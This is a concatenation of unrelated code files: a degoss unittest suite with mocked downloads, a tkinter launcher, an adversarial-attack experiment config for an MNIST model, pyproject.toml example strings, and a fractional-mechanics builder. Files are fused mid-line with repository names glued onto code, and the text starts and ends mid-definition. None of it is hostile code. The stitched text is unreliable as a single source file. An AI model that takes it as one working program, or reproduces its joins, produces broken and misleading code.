description=None, columns=columns, ) def get_scope(self) -> str: return 'extractor.salesforce_metadata' 10-100 #!/usr/bin/env python # -*- coding utf-8 -*- from callback_plugins.degoss_format import CallbackModule as DegossCallbackModule from library.degoss import ( CONSOLE_LOGGING_FORMAT, DISK_LOGGING_FORMAT, Degoss ) import json import logging import mock import os import subprocess import sys import unittest class DegossTestCase(unittest.TestCase): def __init__(self, *args, **kwargs): # call superclass constructor super(DegossTestCase, self).__init__(*args, **kwargs) self.module, self.service = None, None @property def __name__(self): return "DegossTestCase" def setUp(self): """Configure fixtures.""" self.logger = mock.MagicMock() self.module = mock.MagicMock() self.module.params = { # boolean stubs 'literal_true': True, 'literal_false': False, 'string_true_0': 'true', 'string_true_1': 'True', 'string_true_2': 'yes', 'string_true_3': 'on', 'string_false_0': 'false', 'string_false_1': 'False', 'string_false_2': 'no', 'string_false_3': 'off', # actual 'debug': True, 'clean': False, 'clean_on_failure': False, 'facts': '{ "fact": true }', 'test_dir': '/tmp/degoss.demo/tests', 'test_file': '/tmp/degoss.demo/tests/dingo.yml', 'tmp_root': '/tmp/degoss.demo', 'version': '0.3.6', } self.service = Degoss(sys.argv, self.module) self.service.logger = self.logger self.service.os, self.service.arch = 'linux', 'amd64' def test_get_boolean(self): """Test that boolean resolution works as expected.""" self.assertTrue(self.service.get_bool('literal_true')) self.assertFalse(self.service.get_bool('literal_false')) self.assertTrue(self.service.get_bool('string_true_0')) self.assertTrue(self.service.get_bool('string_true_1')) self.assertTrue(self.service.get_bool('string_true_2')) self.assertTrue(self.service.get_bool('string_true_3')) self.assertFalse(self.service.get_bool('string_false_0')) self.assertFalse(self.service.get_bool('string_false_1')) self.assertFalse(self.service.get_bool('string_false_2')) self.assertFalse(self.service.get_bool('string_false_3')) def test_constructor(self): """Tests that the constructor correctly assigns variables from the module input.""" self.assertEqual(True, self.service.debug) self.assertEqual(False, self.service.do_clean) self.assertEqual(False, self.service.clean_on_failure) self.assertEqual('/tmp/degoss.demo/logs', self.service.log_dir) self.assertEqual('/tmp/degoss.demo/logs/degoss.log', self.service.log_file) self.assertEqual('/tmp/degoss.demo/bin', self.service.bin_dir) self.assertEqual('/tmp/degoss.demo/tests', self.service.test_dir) self.assertEqual('dingo.yml', self.service.test_file) self.assertEqual('/tmp/degoss.demo', self.service.tmp_root) self.assertEqual('0.3.6', self.service.requested_version) self.assertIsNotNone(self.service.log_output) @mock.patch('library.degoss.platform.uname') def test_detect_environment(self, mock_uname): """Tests that environment detection works.""" mock_uname.return_value = ('Linux', None, None, None, 'x86_64') detected_os, detected_arch = self.service.detect_environment() self.assertEqual('linux', detected_os) self.assertEqual('amd64', detected_arch) mock_uname.return_value = ('Linux', None, None, None, 'i386') self.service = Degoss(sys.argv, self.module) detected_os, detected_arch = self.service.detect_environment() self.assertEqual('linux', detected_os) self.assertEqual('386', detected_arch) @mock.patch.object(Degoss, 'version', new_callable=mock.PropertyMock) def test_get_release_url(self, mock_version): 
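# --- Editor's illustration: the URL asserted in test_get_release_url (whose
# body follows) implies the goss download URL is assembled from version, OS and
# architecture roughly like this. `goss_release_url` is a hypothetical helper,
# not the real Degoss implementation.
def goss_release_url(version, os_name, arch):
    return ("https://github.com/aelsabbahy/goss/releases/download/"
            "v{0}/goss-{1}-{2}".format(version, os_name, arch))

assert goss_release_url("0.3.6", "linux", "amd64") == \
    "https://github.com/aelsabbahy/goss/releases/download/v0.3.6/goss-linux-amd64"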
mock_version.return_value = '0.3.6' self.service.os = 'linux' self.service.arch = 'amd64' self.assertEqual("https://github.com/aelsabbahy/goss/releases/download/v0.3.6/goss-linux-amd64", self.service.get_release_url()) @mock.patch.object(Degoss, 'get_latest_version') def test_version_latest(self, mock_get_latest_version): """Tests the version getter resolves the latest version properly.""" mock_get_latest_version.return_value = '9.9.9' self.module.params['version'] = 'latest' self.service = Degoss(sys.argv, self.module) self.assertEqual('9.9.9', self.service.version) @mock.patch.object(Degoss, 'get_latest_version') def test_version_hardcoded(self, mock_get_latest_version): """Tests that the version getter returns the specified version.""" self.assertEqual('0.3.6', self.service.version) mock_get_latest_version.assert_not_called() def test_failed(self): """Tests whether failure detection works as expected.""" self.service._has_run, self.service.failed_tests = False, 0 self.assertFalse(self.service.failed) self.service._has_run = True self.assertFalse(self.service.failed) self.service.failed_tests = 1 self.assertTrue(self.service.failed) def test_passed(self): """Tests whether success detection works as expected.""" self.service._has_run = False self.assertFalse(self.service.passed) self.service._has_run, self.service.failed_tests = False, 0 self.assertFalse(self.service.passed) self.service._has_run = True self.assertTrue(self.service.passed) self.service.failed_tests = 1 self.assertFalse(self.service.passed) def test_errored(self): """Tests whether error detection works as expected.""" self.service._has_run, self.service._errored = False, False self.assertFalse(self.service.errored) self.service._has_run = True self.assertFalse(self.service.errored) self.service._errored = True self.assertTrue(self.service.errored) def test_has_run(self): """Tests whether has_run reflects the execution state.""" self.service._has_run = False self.assertFalse(self.service.has_run) self.service._has_run = True self.assertTrue(self.service.has_run) def test_deserialize_dict(self): """Tests that dictionary deserialization works.""" self.service.logger = mock.MagicMock() # edge cases self.assertEqual({}, self.service.deserialize_dict(None)) self.assertEqual({}, self.service.deserialize_dict('')) self.assertEqual({}, self.service.deserialize_dict('[]')) # main case input_value = { 'a': 1, 'b': {}, 'c': [], 'd': { 'e': 'f' } } self.assertEqual(input_value, self.service.deserialize_dict(json.dumps(input_value))) @mock.patch.object(Degoss, 'setup_directories') @mock.patch.object(Degoss, 'setup_logging') @mock.patch.object(Degoss, 'detect_environment') def test_initialize(self, mock_detect_environment, mock_setup_logging, mock_setup_directories): """Tests initialization.""" mock_os, mock_arch = mock.MagicMock(), mock.MagicMock() mock_detect_environment.return_value = mock_os, mock_arch mock_logger = mock.MagicMock() mock_setup_logging.return_value = mock_logger self.service = Degoss(sys.argv, self.module) self.service.initialize() mock_detect_environment.assert_called() mock_setup_directories.assert_called() mock_setup_logging.assert_called() self.assertEqual(mock_arch, self.service.arch) self.assertEqual(mock_logger, self.service.logger) self.assertEqual(mock_os, self.service.os) @mock.patch('library.degoss.logging.FileHandler') @mock.patch('library.degoss.logging.StreamHandler') @mock.patch('library.degoss.logging.getLogger') @mock.patch('library.degoss.logging.addLevelName') def test_setup_logging(self, 
mock_add_level_name, mock_get_logger, mock_new_stream_handler, mock_new_file_handler): """Tests that logging setup works properly.""" mock_logger = mock.MagicMock() mock_get_logger.return_value = mock_logger mock_file_handler = mock.MagicMock() mock_new_file_handler.return_value = mock_file_handler mock_stream_handler = mock.MagicMock() mock_new_stream_handler.return_value = mock_stream_handler self.service = Degoss(sys.argv, self.module) logger = self.service.setup_logging() # global logging changes mock_add_level_name.assert_called_with(30, 'WARN') # our logger mock_get_logger.assert_called_with('degoss') mock_logger.setLevel.assert_called_with(logging.DEBUG) mock_logger.addHandler.assert_any_call(mock_file_handler) mock_logger.addHandler.assert_any_call(mock_stream_handler) # handlers mock_new_file_handler.assert_called_with(filename=self.service.log_file) mock_new_stream_handler.assert_called_with(stream=self.service.log_output) # return value must equal the logger created self.assertEqual(mock_logger, logger) # test with debug false self.module.params['debug'] = False self.service = Degoss(sys.argv, self.module) self.service.setup_logging() mock_logger.setLevel.assert_called_with(logging.INFO) @mock.patch('library.degoss.os.chmod') @mock.patch('library.degoss.os.makedirs') @mock.patch('library.degoss.os.path.isdir') def test_setup_directories(self, mock_is_dir, mock_makedirs, mock_chmod): """Tests that creation of directories works as expected.""" mock_is_dir.return_value = False self.service.os, self.service.arch = 'linux', 'amd64' self.service.setup_directories() mock_is_dir.assert_any_call(self.service.bin_dir) mock_is_dir.assert_any_call(self.service.log_dir) mock_makedirs.assert_any_call(self.service.bin_dir) mock_makedirs.assert_any_call(self.service.log_dir) mock_chmod.assert_any_call(self.service.bin_dir, 0o0755) mock_chmod.assert_any_call(self.service.log_dir, 0o0755) @mock.patch('library.degoss.Request') @mock.patch('library.degoss.urlopen') def test_request(self, mock_urlopen, mock_new_request): """Tests that degoss can create URL requests.""" mock_request = mock.MagicMock() mock_new_request.return_value = mock_request mock_response = mock.MagicMock() mock_response.getcode.return_value = 200 mock_response.geturl.return_value = 'redirect' mock_urlopen.return_value = mock_response status, response_url, response = self.service.request('httpdangus', 'RANG') mock_new_request.assert_called_with('httpdangus') mock_urlopen.assert_called_with(mock_request) self.assertEqual(mock_response, response) self.assertEqual(200, status) self.assertEqual('redirect', response_url) self.assertEqual('RANG', mock_request.get_method()) @mock.patch.object(Degoss, 'request') def test_get_latest_version(self, mock_new_request): """Tests that degoss can detect the latest version of Goss from GitHub.""" mock_request = mock.MagicMock() mock_new_request.return_value = 200, 'aelsabbahy/goss/releases/tag/v0.3.6', mock_request result = self.service.get_latest_version() self.assertEqual('0.3.6', result) mock_new_request.assert_called_with("https://github.com/aelsabbahy/goss/releases/latest") @mock.patch('library.degoss.os.chmod') @mock.patch.object(Degoss, 'request') @mock.patch.object(Degoss, 'get_release_url') def test_install(self, mock_get_release_url, mock_new_request, mock_chmod): """Tests that degoss can install Goss successfully.""" mock_get_release_url.return_value = 'fhwgads' # mock up the response as a file like object chunk_status = { 'emitted': False } def chunk_once(self): if not 
chunk_status['emitted']: chunk_status['emitted'] = True return "ABCDEFG" else: return None mock_response = mock.MagicMock() mock_response.read = chunk_once mock_new_request.return_value = 200, 'url', mock_response patched_open = mock.mock_open() with mock.patch("library.degoss.open", patched_open, create=True): self.service.install() mock_get_release_url.assert_called_with() mock_new_request.assert_called_with('fhwgads') patched_open.assert_called_with(self.service.executable, 'w') file_handle = patched_open() file_handle.write.assert_called_with('ABCDEFG') mock_chmod.assert_called_with(self.service.executable, 0o700) @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_success(self, mock_new_popen, mock_fail): """Tests that degoss can handle successful tests appropriately.""" result_dict = { 'summary': { 'failed-count': 0, 'test-count': 5, } } result_string = json.dumps(result_dict) mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_new_popen.return_value = mock_process # create facts and variables as strings to be deserialized self.service.facts = json.dumps({ 'fact1': True, 'fact2': 'yes', }) self.service.variables = json.dumps({ 'var1': ['yup'], 'var2': None, }) goss_variables = { 'ansible_fact1': True, 'ansible_fact2': 'yes', 'var1': ['yup'], 'var2': None, } patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() # it must have opened the result file patched_open.assert_called_with(self.service.result_file, 'w') file_handle = patched_open() # it must have written the result to the result file file_handle.write.assert_called_with(json.dumps(result_dict, indent=2, sort_keys=True)) # a new process should have been opened like this mock_new_popen.assert_called_with( [self.service.executable, '--gossfile', self.service.test_file, '--vars', '/dev/stdin', 'validate', '--no-color', '--format', 'json'], cwd=self.service.test_dir, env=dict(os.environ), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) # communicate must be called to send variables like this mock_process.communicate.assert_called_with(input=json.dumps(goss_variables)) # it must not have failed mock_fail.assert_not_called() self.assertTrue(self.service._has_run and self.service.has_run) self.assertFalse(self.service._errored) self.assertFalse(self.service.failed) self.assertEqual(0, self.service.failed_tests) self.assertEqual(5, self.service.total_tests) self.assertEqual(self.service.test_result, result_dict) @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_failure(self, mock_new_popen, mock_fail): """Tests that degoss can handle failed tests appropriately.""" result_dict = { 'results': [ { 'summary-line': "Test execution one failed.", 'successful': False }, { 'summary-line': "Test execution two failed.", 'successful': False }, { 'summary-line': "Passed", 'successful': True }, ], 'summary': { 'failed-count': 2, 'test-count': 5, } } result_string = json.dumps(result_dict) mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_new_popen.return_value = mock_process self.service.facts, self.service.variables = {}, {} patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() patched_open.assert_called_with(self.service.result_file, 'w') file_handle = patched_open() # result file must be 
written file_handle.write.assert_called_with(json.dumps(result_dict, indent=2, sort_keys=True)) # just stubs here, all the logic up until process execution completion is the same # process must be creaeted mock_new_popen.assert_called() # communicate must be passed varialbes mock_process.communicate.assert_called_with(input='{}') # instance variables self.assertEqual(result_dict, self.service.test_result) self.assertEqual(2, self.service.failed_tests) self.assertEqual(5, self.service.total_tests) self.assertEqual([ "Test execution one failed.", "Test execution two failed.", ], self.service.failed_messages) # it's a failure, but not a critical failue mock_fail.assert_not_called() @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_error(self, mock_new_popen, mock_fail): """Tests that degoss can handle error cases when running tests.""" result_string = "ERROR: some shit didn't work!" mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_process.returncode = 1 mock_new_popen.return_value = mock_process self.service.facts, self.service.variables = {}, {} patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() file_handle = patched_open() file_handle.write.assert_not_called() mock_new_popen.assert_called() mock_process.communicate.assert_called_with(input='{}') mock_fail.assert_called_with("Goss Execution Failed (Unable to run tests) (rc=1)", stdout_lines=[result_string], rc=1 ) self.assertTrue(self.service._errored) self.assertTrue(self.service.errored) @mock.patch.object(Degoss, 'errored', new_callable=mock.PropertyMock) @mock.patch.object(Degoss, 'failed', new_callable=mock.PropertyMock) @mock.patch('library.degoss.os.path.isdir') @mock.patch('library.degoss.os.path.exists') @mock.patch('library.degoss.shutil.rmtree') def test_clean_on_failure(self, mock_rmtree, mock_exists, mock_is_dir, mock_failed, mock_errored): """Tests that degoss respects the clean on failure flag appropriately.""" mock_exists.return_value, mock_is_dir.return_value = True, True self.service.clean_on_failure = True self.service.do_clean = True mock_failed.return_value, mock_errored.return_value = True, True # clean: True, clean_on_failure: True, failed: True, errored: True self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) mock_rmtree.reset_mock() # clean: True, clean_on_failure: False, failed: True, errored: True self.service.clean_on_failure = False self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: True, errored: False mock_failed.return_value, mock_errored.return_value = True, False self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: False, errored: True mock_failed.return_value, mock_errored.return_value = False, True self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: False, errored: False mock_failed.return_value, mock_errored.return_value = False, False self.service.do_clean = True self.service.clean_on_failure = False self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) mock_rmtree.reset_mock() # clean: True, clean_on_failure: True, failed: True, errored: True mock_failed.return_value, mock_errored.return_value = True, True self.service.do_clean = True self.service.clean_on_failure = True self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) 
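# --- Editor's sketch: the scenarios exercised by test_clean_on_failure above
# (and continuing below) reduce to one predicate: clean only when do_clean is
# set, and, if the run failed or errored, only when clean_on_failure is also
# set. `should_clean` is a hypothetical helper that matches every scenario in
# the test.
def should_clean(do_clean, clean_on_failure, failed, errored):
    return do_clean and (clean_on_failure or not (failed or errored))

assert should_clean(True, True, True, True)        # clean despite failure
assert not should_clean(True, False, True, False)  # failed, no clean_on_failure
assert should_clean(True, False, False, False)     # clean after a clean run
assert not should_clean(False, True, True, True)   # do_clean=False always wins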
mock_rmtree.reset_mock() # clean: False, clean_on_failure: True, failed: True, errored: True # should supersede clean_on_failure self.service.do_clean, self.service.clean_on_failure = False, True self.service.clean() mock_rmtree.assert_not_called() @mock.patch.object(Degoss, 'failed', new_callable=mock.PropertyMock) @mock.patch.object(Degoss, 'clean') @mock.patch.object(Degoss, 'test') @mock.patch.object(Degoss, 'install') @mock.patch.object(Degoss, 'initialize') def test_execute(self, mock_initialize, mock_install, mock_test, mock_clean, mock_failed): """Tests entire workflow execution.""" self.module.exit_json = mock.MagicMock() # test success use case mock_failed.return_value = False self.service.failed_tests = 0 self.service.total_tests = 5 self.service.test_result = { 'time': 'go' } self.service.execute() mock_initialize.assert_called() mock_install.assert_called() mock_test.assert_called() mock_clean.assert_called() self.module.exit_json.assert_called_with(**{ 'changed': False, 'failed': False, 'failures': self.service.failed_messages, 'msg': "Goss Tests Passed", 'test_result': self.service.test_result, 'tests_failed': self.service.failed_tests, 'tests_passed': self.service.total_tests - self.service.failed_tests, 'tests_total': self.service.total_tests, }) self.module.exit_json.reset_mock() # test failure use case mock_failed.return_value = True self.service.failed_messages = [ 'one failed', 'two failed', ] self.service.failed_tests = 2 self.service.total_tests = 5 self.service.test_result = { 'oh': 'noes' } self.service.execute() self.module.exit_json.assert_called_with(**{ 'changed': False, 'failed': True, 'failures': self.service.failed_messages, 'msg': "Goss Tests Failed", 'test_result': self.service.test_result, 'tests_failed': self.service.failed_tests, 'tests_passed': self.service.total_tests - self.service.failed_tests, 'tests_total': self.service.total_tests, }) @mock.patch.object(Degoss, 'clean') def test_fail(self, mock_clean): """Tests that fail works as expected.""" self.module.exit_json = mock.MagicMock() self.service.log_output.write("one\n") self.service.log_output.write("two\n") self.service.fail("Hello", world=True) mock_clean.assert_called_with() self.module.exit_json.assert_called_with(**{ 'failed': True, 'failed_tests': None, 'module_failed': True, 'msg': "Hello", 'output_lines': ["one", "two"], 'test_count': None, 'world': True, }) if __name__ == "__main__": unittest.main() from tkinter import * from Packet import Packet from Window import Window window = Tk() #Creating the Window Object app = Window(window) #Initializing Object window.wm_title("Frame Decoder") # set window title window.geometry("600x130") #Setting up the dimension of the Window (600x110 CROPPED) window.resizable(False, False) #Avoiding resizing the window window.iconbitmap("package.ico") window.mainloop() #Necessary to start the configured window window.mainloop()vfleaking/max-margin import importlib from models import * import core exper = importlib.import_module('exper-final-mnist-cnn-loss-based-lr', __package__) FLAGS = { 'task': 'attack', 'eid': [10000], 'attack_type': core.AttackType.L_INF, 'attack_set': 'test', 'attack_N': 'all', 'attack_B': 128, 'attack_E': 10, 'attack_K': 100, # 'attack_eps_list': [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.2, 0.3],# for L_INF 'attack_eps_list': [0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19],# for L_INF **exper.FLAGS, 'lr': 0.1 } def main(argv): core.run(FLAGS) if __name__ == '__main__': 
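# --- Editor's note on the FLAGS dict above: with dict unpacking, later keys
# win. Keys listed before **exper.FLAGS (such as 'attack_eps_list') are
# overridden by exper.FLAGS if it defines them, while keys listed after
# (here 'lr') override exper.FLAGS. Small self-contained demo:
base = {'lr': 0.01, 'attack_B': 64}
flags = {'attack_B': 128, **base, 'lr': 0.1}
assert flags == {'attack_B': 64, 'lr': 0.1}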
core.app_start()repo-helper/pyproject-examples #!/usr/bin/env python3 # # example_configs.py """ Example configurations, as strings. """ # # Copyright © 2021 <> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. # __all__ = [ "MINIMAL_CONFIG", "KEYWORDS", "AUTHORS", "UNICODE", "MAINTAINERS", "CLASSIFIERS", "DEPENDENCIES", "OPTIONAL_DEPENDENCIES", "OPTIONAL_DEPENDENCIES_EMPTY_GROUP", "URLS", "ENTRY_POINTS", "COMPLETE_PROJECT_A", "COMPLETE_A", "COMPLETE_B", "COMPLETE_A_WITH_FILES", "DYNAMIC_REQUIREMENTS", "LONG_REQUIREMENTS", ] MINIMAL_CONFIG = '[project]\nname = "spam"\nversion = "2020.0.0"' KEYWORDS = f"""\ {MINIMAL_CONFIG} keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"] """ AUTHORS = f"""\ {MINIMAL_CONFIG} authors = [ {{email = ""}}, {{name = ""}} ] """ UNICODE = f"""\ {MINIMAL_CONFIG} description = "Factory ⸻ A code generator 🏭" authors = [{{name = ""}}] """ MAINTAINERS = f"""\ {MINIMAL_CONFIG} maintainers = [ {{name = "", email = ""}} ] """ CLASSIFIERS = f"""\ {MINIMAL_CONFIG} classifiers = [ "Development Status :: 4 - Beta", "Programming Language :: Python" ] """ DEPENDENCIES = f"""\ {MINIMAL_CONFIG} dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] """ OPTIONAL_DEPENDENCIES = f"""\ {MINIMAL_CONFIG} [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]", 'matplotlib>=3.0.0; platform_machine != "aarch64" or python_version > "3.6"', ] """ OPTIONAL_DEPENDENCIES_EMPTY_GROUP = f"""\ {MINIMAL_CONFIG} [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]", 'matplotlib>=3.0.0; platform_machine != "aarch64" or python_version > "3.6"', ] docs = [] """ URLS = f"""\ {MINIMAL_CONFIG} [project.urls] homepage = "example.com" documentation = "readthedocs.org" repository = "github.com" changelog = "github.com/me/spam/blob/master/CHANGELOG.md" """ ENTRY_POINTS = f"""\ {MINIMAL_CONFIG} [project.scripts] spam-cli = "spam:main_cli" [project.gui-scripts] spam-gui = "spam:main_gui" [project.entry-points."spam.magical"] tomatoes = "spam:main_tomatoes" [project.entry-points."flake8.extension"] SXL = "flake8_sphinx_links:Plugin" """ COMPLETE_PROJECT_A = """\ [project] name = "spam" version = "2020.0.0" description = "Lovely Spam! Wonderful Spam!" 
requires-python = ">=3.8" keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"] authors = [ {email = ""}, {name = ""} ] maintainers = [ {name = "", email = ""} ] classifiers = [ "Development Status :: 4 - Beta", "Programming Language :: Python" ] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]" ] [project.urls] homepage = "example.com" documentation = "readthedocs.org" repository = "github.com" changelog = "github.com/me/spam/blob/master/CHANGELOG.md" [project.scripts] spam-cli = "spam:main_cli" [project.gui-scripts] spam-gui = "spam:main_gui" [project.entry-points."spam.magical"] tomatoes = "spam:main_tomatoes" """ COMPLETE_A = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" """ COMPLETE_B = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" additional-files = [ "include whey/style.css", ] """ COMPLETE_A_WITH_FILES = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." 
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] license = { file = "LICENSE" } readme = "README.rst" [[project.authors]] email = "" name = "avis-Foster" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" """ DYNAMIC_REQUIREMENTS = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." readme = "README.rst" keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "dependencies", "requires-python",] [project.license] file = "LICENSE" [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" """ LONG_REQUIREMENTS = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." 
readme = "README.rst" dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'", "typed-ast>=1.4.2; python_version < '3.8' and platform_python_implementation == 'CPython'" ] [project.license] file = "LICENSE" [[project.authors]] email = "" name = "" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] license-key = "MIT" package = "whey" """ 0 import fdm from fdm.builder import * from fdm.utils import create_cached_factory import fractional_mechanics import fractulus class FractionalVirtualBoundaryStrategy(enum.Enum): BASED_ON_SECOND_DERIVATIVE = 0 BASED_ON_FOURTH_DERIVATIVE = 1 def create(type_, *args, **kwargs): builder = create_builder() return builder(type_, *args, **kwargs) def create_builder(): builder = Strategy() builder.register('truss1d', create_for_truss_1d) builder.register('beam1d', create_for_beam_1d) return builder def create_for_truss_1d(length, nodes_number): builder = FractionalBuilder1D(length, nodes_number) builder.set_stiffness_factory({ AnalysisStrategy.UP_TO_DOWN: create_truss_stiffness_operators_up_to_down, AnalysisStrategy.DOWN_TO_UP: create_truss_stiffness_operators_down_to_up, }) builder.set_complex_boundary_factory(create_complex_truss_bcs()) return builder def create_for_beam_1d(length, nodes_number): builder = FractionalBuilder1D(length, nodes_number) builder.set_stiffness_factory({ AnalysisStrategy.UP_TO_DOWN: create_beam_stiffness_operators_up_to_down, AnalysisStrategy.DOWN_TO_UP: create_beam_stiffness_operators_down_to_up, }) builder.set_complex_boundary_factory(create_complex_beam_bcs()) return builder FractionalStiffnessInput = collections.namedtuple('FractionalStiffnessInput', ( 'mesh', 'length', 'span', 'strategy', 'young_modulus_controller', 'alpha', 'resolution', 'length_scale_controller', 'moment_of_inertia_controller', 'integration_method', 'fractional_operator_pattern' )) FractionalBCsInput = collections.namedtuple('FractionalBCsInput', ( 'mesh', 'length', 'span', 'virtual_nodes_strategy', 'alpha', 'resolution', 'length_scale_controller', 'moment_of_inertia_controller', 'integration_method', 'young_modulus_controller' )) class FractionalBuilder1D(Builder1d): def __init__(self, length, nodes_number): fdm.builder.Builder1d.__init__(self, length, nodes_number) self._context['alpha'] = 0.8 self._context['resolution'] = None self._context['integration_method'] = 'caputo' default_length_scale = length * 0.1 self.length_scale_controller = None self.set_length_scale_controller('uniform', default_length_scale) self._context['fractional_operator_pattern'] = { 'central': "CCC", 'backward': "CCC", 'forward': "CCC", } def set_fractional_settings(self, alpha, resolution): self._context['alpha'] = alpha self._context['resolution'] = resolution return self def set_fractional_integration_method(self, method): self._context['integration_method'] = method return self def set_length_scale_controller(self, _type, *args, **kwargs): if _type in LENGTH_SCALES_CONTROLLERS: dynamic_lf = UserValueController( self._length, self._nodes_number, LENGTH_SCALES_CONTROLLERS[_type]( self._length, *args, **kwargs) ) else: dynamic_lf = self._create_value_controller(_type, *args, **kwargs) self.length_scale_controller = self._context['length_scale_controller'] = dynamic_lf return self def set_fractional_operator_pattern(self, **kwargs): self._context['fractional_operator_pattern'].update(kwargs) return self def create(self): return super().create() def 
